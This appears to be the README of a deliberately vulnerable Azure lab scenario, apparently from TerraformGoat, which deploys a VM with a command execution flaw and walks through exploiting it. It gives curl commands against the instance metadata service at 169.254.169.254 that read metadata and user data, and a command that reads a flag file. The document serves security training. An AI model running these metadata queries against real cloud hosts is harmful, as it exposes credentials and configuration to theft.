English | 中文

This is a scenario used to build the Azure VM command execution vulnerability environment.

After building the environment with Terraform, users can obtain metadata and user data and other information on VM through the command execution vulnerabilities.

Execute the following command in the container

cd /TerraformGoat/azure/vm/vm_command_execution

Use the az login command for Azure identity authentication, and follow the prompts to authenticate.

az login

Deploy Vulnerable Environment

terraform init
terraform apply

When the terminal prompts Enter a value:, enter yes

After the environment is set up, You can see the access address of the scenario at Outputs, then access to the browser.

Because the scenario takes some time to build, if your browser cannot access this site, you can wait a few minutes and access it again.

On VM with command execution vulnerabilities, we can use command execution to get VM metadata, user data and other information.

read metadata

curl -H Metadata:true http://169.254.169.254/metadata/instance?api-version=2021-05-01 | python -m json.tool

read user data

The premise is that the target has been configured with user data.

curl -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text" | base64 --decode

In the user data information, you can see that there is a flag file in the root directory of the scenario, try to use command execution to read this file.

cat /flag69152201.txt

Successfully read the flag file.

terraform destroy